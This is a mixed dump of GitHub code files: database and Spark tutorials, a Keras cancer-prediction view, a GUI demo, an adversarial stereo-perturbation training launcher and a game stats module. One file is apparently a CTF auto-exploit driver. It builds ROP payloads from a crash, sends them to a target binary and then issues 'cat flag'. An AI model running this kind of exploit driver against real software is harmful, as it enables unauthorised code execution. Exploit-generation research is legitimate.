+{"seq_id":"72839191687","text":"# Import SQLITE\nimport sqlite3\n\ndef tableExists(con, tableName):\n cur = con.cursor()\n # Zkus...\n try:\n # Ziskat pocet tabulek s nazvem 'tableName' ze specialni tabulky sqlite_master\n cur.execute(\"SELECT COUNT(*) FROM sqlite_master WHERE type=? AND name=?;\", ('table', tableName))\n except sqlite3.Error as e:\n # Ooops, neco se nepovedlo, napis, kde je problem a skocni\n print(\"SQL Error: {0}\".format(e))\n exit(1)\n r = cur.fetchone()\n # Vrat True, pokud SQL dotaz nasel prave jeden zaznam (tzn. tabulka 'tableName' existuje),\n # nebo False, pokud SQL dotaz nenasel nic (tzn. tabulka 'tableName' neexistuje)\n return r[0] == 1\n\ndef createMyTable(con):\n cur = con.cursor()\n # Zkus ...\n try:\n # Vytvorit tabulku mytable\n cur.execute(\"CREATE TABLE mytable (id INTEGER PRIMARY KEY AUTOINCREMENT, name VARCHAR(60), date DATETIME);\")\n except sqlite3.Error as e:\n # Ooops, neco se nepovadlo, napis, kde je problem a skonci\n print(\"SQL Error: {0}\".format(e))\n exit(1)\n\n\n# Otevri nasi databazi\ncon = sqlite3.connect('mydb.sqlite')\n# Ziskej kurzor, \"ukazatel\" do nasi databaze\ncur = con.cursor()\n\n# Zkontroluj, jestli tabulka uz existuje a kdyz ne, tak ji vytvor\nif not tableExists(con, 'mytable'):\n createMyTable(con)\n\n# Zeptej se na jmeno\nname = input(\"Zadej jmeno: \")\n\n# Zkus...\ntry:\n # Vloz do tabulky zadane jmeno a aktualni datum a cas\n cur.execute(\"INSERT INTO mytable (name, date) VALUES(?, datetime('now'));\", (name,));\nexcept sqlite3.Error as e:\n # Kdyz se to nepovede, tak vypis proc a skonci\n print(\"SQL Error: {0}\".format(e))\n exit(1)\n\n# Vsechno se povedlo, ukonci transakci a data fyzicky uloz do databaze (na disk)\ncon.commit()\n\n# Vyber vsechny zaznamy z tabulky\nres = cur.execute(\"SELECT id, name, date FROM mytable ORDER BY date DESC;\")\n\n# Vezmi jeden zaznam z 'res' (vysledku')\nrow = res.fetchone()\n# Opakuj, dokud row neni None (prazdny)\nwhile row != None:\n # Vypis jmeno a datum z aktualniho zaznamu\n print(\"ID: {id:<5} Name: {name:10} Date: {date}\".format(id = row[0], name=row[1], date=row[2]))\n # Posun se na dalsi zaznam z tabulky\n row = res.fetchone()\n\n# Ukonci spojeni s databazi a skonci\ncon.close()\n","repo_name":"danvratil/dapraha-flask","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"sl","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"10417312929","text":"# May cause deprecation warnings, safe to ignore, they aren't errors\nfrom pyspark import SparkContext\nfrom pyspark.streaming import StreamingContext\nfrom pyspark.sql import SQLContext\nfrom pyspark.sql.functions import desc\n# Can only run this once. restart your kernel for any errors.\nsc = SparkContext()\n\nssc = StreamingContext(sc, 10 )\nsqlContext = SQLContext(sc)\nsocket_stream = ssc.socketTextStream(\"127.0.0.1\", 5555)\nlines = socket_stream.window( 20 )\nfrom collections import namedtuple\nfields = (\"tag\", \"count\" )\nTweet = namedtuple( 'Tweet', fields )\n# Use Parenthesis for multiple lines or use \\.\n( lines.flatMap( lambda text: text.split( \" \" ) ) #Splits to a list\n .filter( lambda word: word.lower().startswith(\"#\") ) # Checks for hashtag calls\n .map( lambda word: ( word.lower(), 1 ) ) # Lower cases the word\n .reduceByKey( lambda a, b: a + b ) # Reduces\n .map( lambda rec: Tweet( rec[0], rec[1] ) ) # Stores in a Tweet Object\n .foreachRDD( lambda rdd: rdd.toDF().sort( desc(\"count\") ) # Sorts Them in a DF\n .limit(10).registerTempTable(\"tweets\") ) ) # Registers to a table.","repo_name":"JacobMonksRev/BigData05312022","sub_path":"Notes/Week9/Twitter_Stream/spark_st_run.py","file_name":"spark_st_run.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"}
+{"seq_id":"20436454649","text":"from django.shortcuts import render,HttpResponse,redirect,get_object_or_404\nfrom .models import Cancer\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation\nimport keras\nfrom keras.layers import Input, Dense\nfrom keras.optimizers import SGD\nfrom sklearn.impute import SimpleImputer\nimport numpy as np\nimport pandas as pd\n# from .myform import MyForm\n# Create your views here.\ndef index(request):\n return render(request, \"index.html\")\n\ndef features(request):\n return render(request, \"features.html\")\n\ndef price(request):\n return render(request, \"pricing.html\")\n\ndef blog(request):\n return render(request, \"blog.html\")\n\ndef contact(request):\n return render(request, \"contact.html\")\n\ndef cancer(request):\n cancers = Cancer.objects.all()\n\n return render(request, \"test.html\",{\"cancers\":cancers})\n\ndef addCancer(request):\n # f = MyForm()\n if request.method == \"GET\":\n return redirect(\"/cancer\")\n else:\n # Hasta Kişisel Bilgileri\n tc = request.POST.get(\"tc\")\n firstName = request.POST.get(\"firstName\")\n lastName = request.POST.get(\"lastName\")\n length = request.POST.get(\"length\")\n age = request.POST.get(\"age\")\n sex = request.POST.get(\"sex\")\n city = request.POST.get(\"city\")\n country = request.POST.get(\"country\")\n # ************Yapay Zeka Alanı****************\n # verilerimizi okuyup değişkenimizin içine atıyorum\n veri = pd.read_csv(\"datasets/breast-cancer.data\")\n # verisetimizde bulunan \"?\" yani bilinmeyen kısımları hesaplanmaması için -99999 gibi bir değer veriyorum\n veri.replace('?', -99999, inplace=True)\n veriyeni = veri.drop(['1000025'], axis=1)\n imp = SimpleImputer(missing_values=-99999, strategy=\"mean\", fill_value=None, verbose=0, copy=True)\n veriyeni = imp.fit_transform(veriyeni) # sklearn\n # 8 adet özelliğe bağlı bir giriş katmanımız var \n # (Hücre Boyutunun Düzgünlüğü, Hücre Şeklinin Düzgünlüğü, Marjinal Yapışma, Tek Epitel Hücre Boyutu,\n # Çıplak Çekirdekler, Uyumlu Kromatin, Normal Nikloeller, Normal Nikloeller, Mitoz)\n # bu 8 katmana göre 1 tane veriyi tahmin etmeye çalışıyoruz\n giris = veriyeni[:, 0:8] # giris.shape => (698,8) 8 özelliğe bağlı giriş katmanımız\n cikis = veriyeni[:, 9] # cikis.shape => 8 özellikten tahmin ettiğimiz çıkış katmanımız\n # *** VERİ SETİ İŞLEMLERİ TAMAM ŞİMDİ MODELİMİZİ OLUŞTURALIM\n # bu altta vereceğim fotoğraf sequential le alakalı sunumda felan kullanıp 63 ve 64.satırları sil\n # https://bilimfili.com/wp-content/uploads/2015/12/yapay-sinir-aglari1-bilimfilicom.jpg\n model = Sequential() # Yapay sinir ağları algılayıcıların ardışık olmasına bağlı \n # Dense: yapay sinir ağında görülen her ağ kendinden sonraki noktalara bağlı\n # input dimension ' a kaç tane özelliğimiz olduğunu yazıyoruz biz 8 özellikten output u tahmin edeceğiz\n model.add(Dense(10, input_dim=8))\n # Aktivasyon fonksiyonuna sokalım\n # Step Fonksiyonu: Bir eşik değeri alarak ikili bir sınıflandırma çıktısı (0 yada 1) üretir.\n # Sigmoid Fonksiyonu: En yaygın kullanılan aktivasyon fonksiyonlarından birisidir, [0,1] aralığında çıktı üretir.\n # Tanh Fonksiyonu: [-1,1] aralığında çıktı üreten doğrusal olmayan bir fonksiyondur.\n # ReLU Fonksiyonu: Doğrusal olmayan bir fonksiyondur. ReLU fonksiyonu negatif girdiler için 0 değerini alırken, x pozitif girdiler için x değerini almaktadır.\n # Softmax Fonksiyonu: Çoklu sınıflandırma problemleri için kullanılan bu fonksiyon, verilen her bir girdinin bir sınıfa ait olma olasılığını gösteren [0,1] arası çıktılar üretmektedir.\n # Softplus Fonksiyonu: Sigmoid ve Tanh gibi geleneksel aktivasyon fonksiyonlarına alternatif olarak sunulan bu fonksiyon (0, +∞) aralığında türevlenebilir bir çıktı üretmektedir.\n # ELU Fonksiyonu: Üstel lineer birim, negatif girdiler hariç ReLU ile benzerdir. Negatif girdilerde ise genellikle 1.0 alınan alfa parametresi almaktadır.\n # PReLU Fonksiyonu: Parametrik ReLU olarak geçen bu aktivasyon fonksiyonu da negatif girdiler için extra alfa sabiti ile verilen girdinin çarpım sonucunu çıktı olarak üretmektedir.\n # Swish Fonksiyonu: Google araştırmacıları tarafından yeni keşfedilen bu fonksiyon girdiler ile sigmoid fonksiyonunun çarpımını çıktı olarak üretmektedir.\n # İlk başta hidden layers kısmını yazdık şimdi aktivasyon fonksiyonuyla verilerimizi normalize ettik yani 0-1 arasına yerleştirdik\n # NEDEN RELU yu kullandık?\n # Matrislerde sürekli y = mx + b işlemi çalışacağı için çok yüksek değerler elde ediyoruz biz bunu belli bir değer arasına sokmamız lazım\n # bunun için aktivasyon fonksiyonu kullanıyoruz verilerimizi 0 ile 1 arasına sokuyoruz \n model.add(Activation('relu')) # model.add(Activation('tanh')) daha hızlı sonuç verdi\n # Katmandaki node ların yarısını o tekrar içine sokmuyor eğer 0.2 yazılırsa 5'te 1 ini o tekrar için işleme sokmaz.\n # farklı node ları işleme sokmamızın nedeni veri seti ezberinin önüne geçmek için yapıyoruz \n # eğer dropout kullanmazsak tahminimiz %100 olur fakat bu ezberlenmiş bir model demektir bizim için makul değer %90-%95 \n model.add(Dropout(0.5))\n model.add(Dense(10))\n model.add(Activation('relu')) # model.add(Activation('tanh'))\n model.add(Dropout(0.5))\n model.add(Dense(10))\n model.add(Activation('softmax')) # hep en sonda tut\n # Yapay sinir ağımızı oluşturduk \n # lr: learning rate =>Ne kadar hızlı öğreneceğimizi anlamaya çalışan bir sistem\n # lr ile epoch arasında ters orantı var\n # lr yi düşük alrısak epoch değerini yüksek almamız gerekir \n optimizer = keras.optimizers.SGD(lr=0.01)\n # gerçek-tahmini karesini alıp türevini 0 a eşitliyoruz \n # algoritmamızın ne kadar doğru ne kadar yanlış yaptığını anlamak için metrics = accuracy yapıyoruz \n model.compile(optimizer=optimizer, loss='sparse_categorical_crossentropy', metrics=['accuracy'])\n # modelimiz bitti şimdi bu verileri modele yerleştirmek kaldı \n # 2: iyi huylu tümör, 4: kötü huylu tümör\n # epochs: veri setini ayrı ayrı 10 kere tarayacak\n # batch_size: aynı anda kaç bit lik işlemi hafızaya alsın yazılmazsa kendisi otomatik değer atar.\n # validation_split: (Doğrulama kısmı) bütün verimizin bir kısmını yapay sinir ağımıza yerleştirelim\n # Elimizde kalan sinir ağına sokmadığımız işlenmemiş veriyi veri setine sokarak tahmin etmesini sağlayacağız.\n # eğer tamamıyla işleme sokarsak model verileri ezberler. Bizim amacımız görmeden tahmin etmesi \n model.fit(giris, cikis, epochs=10, batch_size=32, validation_split=0.20)\n # inputlar\n uniformity_cell_size = request.POST.get(\"uniformity_cell_size\")\n uniformity_cell_shape = request.POST.get(\"uniformity_cell_shape\")\n marginal_adhesion = request.POST.get(\"marginal_adhesion\")\n single_epithelial_cell_size = request.POST.get(\"single_epithelial_cell_size\")\n bare_nuclei = request.POST.get(\"bare_nuclei\")\n bland_chromatin = request.POST.get(\"bland_chromatin\")\n normal_nucleoli = request.POST.get(\"normal_nucleoli\")\n mitoses = request.POST.get(\"mitoses\")\n #a = 5\n #b = 5\n #c = 5\n #d = 8\n #e = 10\n #f = 8\n #g = 7\n #h = 3\n tahmin = np.array(\n [\n uniformity_cell_size,\n uniformity_cell_shape,\n marginal_adhesion,\n single_epithelial_cell_size,\n bare_nuclei,\n bland_chromatin,\n normal_nucleoli,\n mitoses\n ]\n ).reshape(1, 8)\n print(model.predict_classes(tahmin))\n result = model.predict_classes(tahmin)\n newCancer = Cancer(\n tc=tc,\n firstName=firstName,\n lastName=lastName,\n length=length,\n age=age,\n sex=sex,\n city=city,\n country=country,\n uniformity_cell_size=uniformity_cell_size,\n uniformity_cell_shape=uniformity_cell_shape,\n marginal_adhesion=marginal_adhesion,\n single_epithelial_cell_size=single_epithelial_cell_size,\n bare_nuclei=bare_nuclei,\n bland_chromatin=bland_chromatin,\n normal_nucleoli=normal_nucleoli,\n mitoses=mitoses,\n result = result\n )\n newCancer.save()\n return redirect(\"/cancer\")\n\n# Kayıt Silme\ndef deleteResult(request,id):\n cancer= get_object_or_404(Cancer, id = id)\n cancer.delete()\n return redirect(\"/cancer\")","repo_name":"Yigit-dev/Breast-Cancer-Detection-with-Artificial-Intelligence","sub_path":"Project/project/cancer/views-with-Comments.py","file_name":"views-with-Comments.py","file_ext":"py","file_size_in_byte":8533,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"16016986306","text":"import autograd.numpy as np\n\nimport gym\nfrom trajopt.gps import MBGPS\n\nimport matplotlib.pyplot as plt\n\nfrom joblib import Parallel, delayed\n\nimport multiprocessing\nnb_cores = multiprocessing.cpu_count()\n\n\ndef create_job(kwargs):\n import warnings\n warnings.filterwarnings(\"ignore\")\n\n # pendulum env\n env = gym.make('Pendulum-TO-v0')\n env._max_episode_steps = 10000\n env.unwrapped.dt = 0.02\n env.unwrapped.umax = np.array([2.5])\n env.unwrapped.periodic = False\n\n dm_state = env.observation_space.shape[0]\n dm_act = env.action_space.shape[0]\n\n state = env.reset()\n init_state = tuple([state, 1e-4 * np.eye(dm_state)])\n solver = MBGPS(env, init_state=init_state,\n init_action_sigma=25., nb_steps=300,\n kl_bound=.1, action_penalty=1e-3,\n activation={'shift': 250, 'mult': 0.5})\n\n solver.run(nb_iter=100, verbose=False)\n\n solver.ctl.sigma = np.dstack([1e-1 * np.eye(dm_act)] * 300)\n data = solver.rollout(nb_episodes=1, stoch=True, init=state)\n\n obs, act = np.squeeze(data['x'], axis=-1).T, np.squeeze(data['u'], axis=-1).T\n return obs, act\n\n\ndef parallel_gps(nb_jobs=50):\n kwargs_list = [{} for _ in range(nb_jobs)]\n results = Parallel(n_jobs=min(nb_jobs, 20),\n verbose=10, backend='loky')(map(delayed(create_job), kwargs_list))\n obs, act = list(map(list, zip(*results)))\n return obs, act\n\n\nobs, act = parallel_gps(nb_jobs=50)\n\nplt.figure()\nfig, ax = plt.subplots(nrows=3, ncols=1, figsize=(12, 4))\nfor _obs, _act in zip(obs, act):\n ax[0].plot(_obs[:, :-1])\n ax[1].plot(_obs[:, -1])\n ax[2].plot(_act)\nplt.show()\n\nimport pickle\ndata = {'obs': obs, 'act': act}\npickle.dump(data, open(\"gps_pendulum_other.pkl\", \"wb\"))\n","repo_name":"hanyas/trajopt","sub_path":"examples/gps/analytical/topt/mb_pendulum_parallel.py","file_name":"mb_pendulum_parallel.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"16"}
+{"seq_id":"35353236233","text":"import wx\n\nclass MyApp(wx.App):\n\tdef OnInit(self):\n\t\tmyframe = wx.Frame(None,-1,'test')\n\t\tmytext = wx.TextCtrl(myframe,-1,style=wx.TE_READONLY)\t# we display the selection in it\n\t\tmytree = wx.TreeCtrl(myframe,-1,style=wx.TR_HAS_BUTTONS|wx.TR_SINGLE)\t# only one item can be selected !\n\t\trootItem = mytree.AddRoot('Root')\n\t\t# populate the tree\n\t\tfor i in range(10):\n\t\t\ttmpkey = 'key_%s'%i\n\t\t\titem = mytree.AppendItem(rootItem,tmpkey)\n\t\t\tfor j in range(10):\n\t\t\t\tmytree.AppendItem(item,'tmpkey_%s'%j)\n\t\tmytree.Expand(rootItem)\n\t\t# set events\n\t\twx.EVT_TREE_BEGIN_DRAG(mytree,mytree.GetId(),lambda evt: evt.Allow())\n\t\twx.EVT_TREE_SEL_CHANGED(mytree,mytree.GetId(),lambda evt: mytext.SetValue(mytree.GetItemText(mytree.GetSelection())))\n\t\t# layout\n\t\ts = wx.BoxSizer(wx.HORIZONTAL)\n\t\ts.Add(mytree,1,wx.EXPAND)\n\t\ts.Add(mytext,0,0)\n\t\tmyframe.SetSizer(s)\n\t\tmyframe.Layout()\n\t\t# show the window\n\t\tmyframe.Show()\n\t\treturn True\n\t\t\nmyApp = MyApp()\nmyApp.MainLoop()\n\n \t \t \n","repo_name":"wxWidgets/trac-attachments","sub_path":"ticket/487/4874f491eab06ba3e0df4386a569fb51c7c548f1/4676e4b7e18c6e5b69d91d7e1aad3ac80ba68931.py","file_name":"4676e4b7e18c6e5b69d91d7e1aad3ac80ba68931.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"13745041989","text":"'''\nAuthor: Zachery Berger , Parth Agrawal , Tian Yu Liu , Alex Wong \nIf you use this code, please cite the following paper:\n\nZ. Berger, P. Agrawal, T. Liu, S. Soatto, and A. Wong. Stereoscopic Universal Perturbations across Different Architectures and Datasets.\nhttps://arxiv.org/pdf/2112.06116.pdf\n\n@inproceedings{berger2022stereoscopic,\n title={Stereoscopic Universal Perturbations across Different Architectures and Datasets},\n author={Berger, Zachery and Agrawal, Parth and Liu, Tian Yu and Soatto, Stefano and Wong, Alex},\n booktitle={Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition},\n year={2022}\n}\n'''\n\nimport argparse\nimport global_constants as settings\nfrom perturb_main import train\n\n\nparser = argparse.ArgumentParser()\n\n# Training and validation input filepaths\nparser.add_argument('--train_image0_path',\n type=str, required=True, help='Path to list of left image paths')\nparser.add_argument('--train_image1_path',\n type=str, required=True, help='Path to list of right image paths')\nparser.add_argument('--train_pseudo_ground_truth_path',\n type=str, default=None, help='Path to list of ground truth disparity paths')\nparser.add_argument('--val_image0_path',\n type=str, default=None, help='Path to list of left image paths')\nparser.add_argument('--val_image1_path',\n type=str, default=None, help='Path to list of right image paths')\nparser.add_argument('--val_ground_truth_path',\n type=str, default=None, help='Path to list of ground truth disparity paths')\n\n# Perturbation model settings\nparser.add_argument('--n_image_height',\n type=int, default=settings.N_IMAGE_HEIGHT, help='Height of each sample')\nparser.add_argument('--n_image_width',\n type=int, default=settings.N_IMAGE_WIDTH, help='Width of each sample')\nparser.add_argument('--output_norm',\n type=float, default=settings.OUTPUT_NORM, help='Output norm of noise')\nparser.add_argument('--gradient_scale',\n type=float, default=settings.GRADIENT_SCALE, help='Value to scale gradients by')\nparser.add_argument('--attack',\n type=str, default=settings.ATTACK, help='Perturbation attack method: [full, tile]')\nparser.add_argument('--n_perturbation_height',\n type=int, default=settings.N_PERTURBATION_HEIGHT, help='Height of perturbation')\nparser.add_argument('--n_perturbation_width',\n type=int, default=settings.N_PERTURBATION_WIDTH, help='Width of perturbation')\n\n# Optimization settings\nparser.add_argument('--n_batch',\n type=int, default=settings.N_BATCH, help='Number of samples per batch')\nparser.add_argument('--n_epoch',\n type=int, default=settings.N_EPOCH, help='Number of samples per batch')\n\n# Stereo model settings\nparser.add_argument('--stereo_method',\n type=str, default=settings.STEREO_METHOD, help='Stereo method available: %s' % settings.STEREO_METHOD_AVAILABLE)\nparser.add_argument('--stereo_model_restore_path',\n type=str, default='', help='Path to restore model checkpoint')\nparser.add_argument('--num_deform_layers',\n type=int, default=0, help='Number of deformable convolution layers [0, 6, 25]')\n\n# Checkpoint settings\nparser.add_argument('--n_checkpoint',\n type=int, default=settings.N_CHECKPOINT, help='Number of steps before saving a checkpoint')\nparser.add_argument('--checkpoint_path',\n type=str, required=True, help='Path to save checkpoints')\n\n# Hardware settings\nparser.add_argument('--n_worker',\n type=int, default=settings.N_WORKER, help='Number of workers/threads to use')\nparser.add_argument('--device',\n type=str, default=settings.DEVICE, help='Device to use: gpu, cpu')\n\n\nargs = parser.parse_args()\n\nif __name__ == '__main__':\n\n args.stereo_method = args.stereo_method.lower()\n\n args.device = args.device.lower()\n\n if args.device not in [settings.GPU, settings.CPU, settings.CUDA]:\n args.device = settings.CUDA\n\n args.device = settings.CUDA if args.device == settings.GPU else args.device\n\n train(train_image0_path=args.train_image0_path,\n train_image1_path=args.train_image1_path,\n train_pseudo_ground_truth_path=args.train_pseudo_ground_truth_path,\n val_image0_path=args.val_image0_path,\n val_image1_path=args.val_image1_path,\n val_ground_truth_path=args.val_ground_truth_path,\n # Perturbation model settings\n n_image_height=args.n_image_height,\n n_image_width=args.n_image_width,\n output_norm=args.output_norm,\n gradient_scale=args.gradient_scale,\n attack=args.attack,\n n_perturbation_height=args.n_perturbation_height,\n n_perturbation_width=args.n_perturbation_width,\n # Optimization settings\n n_batch=args.n_batch,\n n_epoch=args.n_epoch,\n # Stereo model settings\n stereo_method=args.stereo_method,\n stereo_model_restore_path=args.stereo_model_restore_path,\n num_deform_layers=args.num_deform_layers,\n # Checkpoint settings\n n_checkpoint=args.n_checkpoint,\n checkpoint_path=args.checkpoint_path,\n # Hardware settings\n n_worker=args.n_worker,\n device=args.device)\n","repo_name":"alexklwong/stereoscopic-universal-perturbations","sub_path":"src/train_perturb_model.py","file_name":"train_perturb_model.py","file_ext":"py","file_size_in_byte":5219,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"16"}
+{"seq_id":"1425350306","text":"# D3 12649 N Castle\n# 아직 x\n\ndef dfs(level):\n # 현재 level 에서 선택할수 있는 x 좌표는 0 1 2\n if level == N :\n de = - 1\n return\n for x in range(N):\n if used[x] == 1 :\n continue\n used[x] = 1 # x좌표 사용(이후의 재귀호출에서 재사용 방지)\n dfs(level+1)\n used[x] = 0 # 원상복구\n return\n \nfor _ in range(10):\n N = int(input())\n dfs(N)\n\nused = [0] * N # 0 1 2 의 사용 여부\n\n\n","repo_name":"hhongjj/Algorithm","sub_path":"SWEA/D3/D3_12649_NCastle.py","file_name":"D3_12649_NCastle.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"18581653828","text":"from .x86_attack.init import *\nfrom .x86_attack.analyze import *\nimport sys\nfrom .x86_attack.shell_craft import *\n\nif __name__ == '__main__':\n info = {}\n lcs = {}\n rop_and_index = {}\n payload = []\n flag = []\n binary = sys.argv[1]\n crash_file = sys.argv[2]\n f = open(crash_file, 'r')\n crash = f.read()\n f.close()\n\n init = init(binary, crash_file)\n info = init.get_state()\n #print INFO\n\n analyze = analyze(info, binary, crash)\n lcs = analyze.find_lcs()\n if lcs == -1:\n sys.exit(0)\n rop_and_index = analyze.calc_index()\n\n shell = shell_craft(binary, crash, rop_and_index, info)\n payload = shell.create_payload()\n\n for i in payload:\n p = process(binary)\n\n p.sendline(i)\n p.sendline('echo zxcv;cat flag;')\n try:\n p.recvuntil('zxcv\\n')\n flag.append(p.recvuntil('}'))\n p.close()\n except:\n p.close()\n pass\n\n for i in flag:\n if i is not '':\n log.info(i)\n\n\n\n\n\n\n\n","repo_name":"t3ls/rex-r","sub_path":"rexR-V1.0.5-release/x86_attack/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"}
+{"seq_id":"12904739789","text":"\"\"\"\nThis module defines how variables are tracked in order to send to Max via OSC.\n\nThere are various Stat objects that record specific types of variables or record variables\nin specific ways, as well as the StatManager object which defines all stats to record and send.\n\nAuthor: Gregg Oliva\n\"\"\"\n\n# stdlib imports\nfrom typing import Any, Dict, List, Union\n\n# project imports\nimport debug\nfrom defs import (\n SCREEN_WIDTH,\n SCREEN_HEIGHT,\n PROJECTILE_TYPES,\n REST, NUM_VOICES,\n FPS,\n RECORD_MUSIC\n)\nfrom osc_client import osc, OSCHandler\n\n\nclass Stat:\n \"\"\"A simple Number Stat to be sent via OSC\"\"\"\n def __init__(self, value: Any, send: bool = True) -> None:\n self.value = value\n self.send = send\n\n def update(self, value: Any) -> None:\n \"\"\"Set the value of this stat to a different object\"\"\"\n self.value = value\n\n def __add__(self, other) -> \"Stat\":\n stat = Stat(self.value + other.value, self.send) \\\n if isinstance(other, Stat) \\\n else Stat(self.value + other, self.send)\n\n return stat\n\n def __sub__(self, other) -> \"Stat\":\n stat = Stat(self.value - other.value, self.send) \\\n if isinstance(other, Stat) \\\n else Stat(self.value - other, self.send)\n\n return stat\n\n def __mul__(self, other) -> \"Stat\":\n stat = Stat(self.value * other.value, self.send) \\\n if isinstance(other, Stat) \\\n else Stat(self.value * other, self.send)\n\n return stat\n\n def __div__(self, other) -> \"Stat\":\n stat = Stat(self.value / other.value, self.send) \\\n if isinstance(other, Stat) \\\n else Stat(self.value / other, self.send)\n\n return stat\n\n def __truediv__(self, other) -> \"Stat\":\n return self.__div__(other)\n\n def __lt__(self, other) -> bool:\n return self.value < other.value \\\n if isinstance(other, Stat) \\\n else self.value < other\n\n def __le__(self, other) -> bool:\n return self.value <= other.value \\\n if isinstance(other, Stat) \\\n else self.value <= other\n\n def __eq__(self, other) -> bool:\n return self.value == other.value \\\n if isinstance(other, Stat) \\\n else self.value == other\n\n def __ne__(self, other) -> bool:\n return self.value != other.value \\\n if isinstance(other, Stat) \\\n else self.value != other\n\n def __gt__(self, other) -> bool:\n return self.value > other.value \\\n if isinstance(other, Stat) \\\n else self.value > other\n\n def __ge__(self, other) -> bool:\n return self.value >= other.value \\\n if isinstance(other, Stat) \\\n else self.value >= other\n\n def __str__(self) -> str:\n return str(self.value)\n\n def __repr__(self) -> str:\n return str(f'Stat(Value={self.value}, OSC={self.send})')\n\n\nclass TextStat:\n \"\"\"A stat that tracks strings\"\"\"\n def __init__(self, initial_text: str = '', send: bool = True) -> None:\n self.text = initial_text\n self.send = send\n\n def update(self, text: str) -> None:\n \"\"\"Update the string\"\"\"\n self.text = text\n\n def __str__(self) -> str:\n return self.text\n\n def __repr__(self) -> str:\n return str(f'TextStat(Text={self.text})')\n\n\nclass TimeStat:\n \"\"\"A stat that tracks time in ms, seconds, minutes, and hours\"\"\"\n def __init__(self, total_ms, send: bool = True) -> None:\n self.total_ms = total_ms\n self.send = send\n\n seconds, self.ms = divmod(self.total_ms, 1000)\n minutes, self.seconds = divmod(seconds, 60)\n self.hours, self.minutes = divmod(minutes, 60)\n\n @property\n def time(self):\n \"\"\"Represents Time as a tuple of Hours, Minutes, Seconds, and Ms\"\"\"\n return (self.hours, self.minutes, self.seconds, self.ms)\n\n @property\n def time_display(self) -> str:\n \"\"\"\n Display the time in a format that makes sense with how much time has ellapsed.\n e.g. as (4 minutes 32 seconds), (24 seconds), (1 hour 3 minutes 10 seconds),\n\n This function is useful for displaying Time Stats in the DEATH MENU\n \"\"\"\n time_str = [f'{self.seconds} Seconds']\n if self.minutes > 0:\n time_str.insert(0, f'{self.minutes} Minutes')\n if self.hours > 0:\n time_str.insert(0, f'{self.hours} Hours')\n return ' '.join(time_str)\n\n def __sub__(self, other) -> \"TimeStat\":\n if isinstance(other, TimeStat):\n return TimeStat(self.total_ms - other.total_ms)\n elif isinstance(other, (int, float)):\n return TimeStat(self.total_ms - other)\n else:\n raise TypeError(f'{self.__class__} unable to perform subtraction with type: {type(other)}')\n\n def __str__(self) -> str:\n return str(self.total_ms)\n\n def __repr__(self) -> str:\n return str(f'TimeStat(Hours={self.hours}, Minutes={self.minutes}, Seconds={self.seconds}, Milliseconds={self.ms})')\n\n\nclass TrackerStat:\n \"\"\"\n Tracks information about a numerical Stat that changes/updates frequently.\n\n Tracks the following:\n 1) Min. value recorded\n 2) Avg. of all values recorded\n 3) The most recent value recorded\n 4) Max. value recorded\n 5) Total number of values recorded\n\n \"\"\"\n def __init__(self, send_mode: int = 0, send: bool = True) -> None:\n self.sum = 0\n self.last = 0\n self.count = 0\n self.min = float('inf')\n self.max = float('-inf')\n\n if send_mode > len(self.list):\n send_mode = 0\n\n self.send_mode = send_mode\n self.send = send\n\n @property\n def avg(self) -> float:\n \"\"\"\n Calculate the average of all tracked values\n \"\"\"\n if self.count > 0:\n return self.sum / self.count\n else:\n return 0\n\n @property\n def list(self) -> List:\n \"\"\"\n All tracked values as a List\n \"\"\"\n return [self.min, self.avg, self.last, self.max, self.count]\n\n @property\n def value(self) -> Union[int, float, List]:\n \"\"\"\n Returns one or more of the tracked values depending on the send_mode\n\n send_mode = 0: Return all tracked values as a list\n send_mode = 1: Return the min\n send_mode = 2: Return the avg\n send_mode = 3: Return the most recent\n send_mode = 4: Return the max\n send_mode = 5: Return the count\n \"\"\"\n if self.send_mode == 0:\n return self.list\n\n return self.list[self.send_mode - 1]\n\n def add(self, val: float):\n \"\"\"\n Add a new value to be tracked\n \"\"\"\n self.last = val\n self.sum += val\n self.count += 1\n if val > self.max:\n self.max = val\n if val < self.min:\n self.min = val\n\n def __str__(self) -> str:\n return str(self.avg)\n\n def __repr__(self) -> str:\n return str(f'TrackerStat(Average={self.avg}, Last={self.last} Count={self.count}, Min={self.min}, Max={self.max})')\n\n\nclass CounterStat:\n \"\"\"A stat that maps strings to counts\"\"\"\n def __init__(self, init_values: List[str] = None, send: bool = True) -> None:\n self._items = {} if init_values is None else {key: 0 for key in init_values}\n self.count = 0\n self.send = send\n\n @property\n def items(self) -> List[Union[str, int]]:\n \"\"\"\n Returns a List of tuple pairs: (item_str, item_count)\n \"\"\"\n items_list = []\n for key, val in self._items.items():\n items_list.extend([key, val])\n return items_list\n\n def get(self, item: str) -> int:\n \"\"\"Get an item by name\"\"\"\n return self._items[item]\n\n def increase(self, item: str) -> None:\n \"\"\"Increase the value of an item, or add the item to the map\"\"\"\n if item not in self._items:\n self._items[item] = 1\n else:\n self._items[item] += 1\n\n self.count += 1\n\n\nclass ListStat:\n \"\"\"A stat that tracks Lists\"\"\"\n def __init__(self, initial_length: int = 0, initial_fill: int = 0, send: bool = True) -> None:\n self.list = [initial_fill for _ in range(initial_length)]\n self.send = send\n\n def add_at_index(self, index: int, val: int):\n \"\"\"Increase the value at the index by one\"\"\"\n self.list[index] += val\n\n def update(self, *vals: int):\n \"\"\"Update the entire list to equal this new list\"\"\"\n for idx, val in enumerate(vals):\n self.list[idx] = val\n\n def 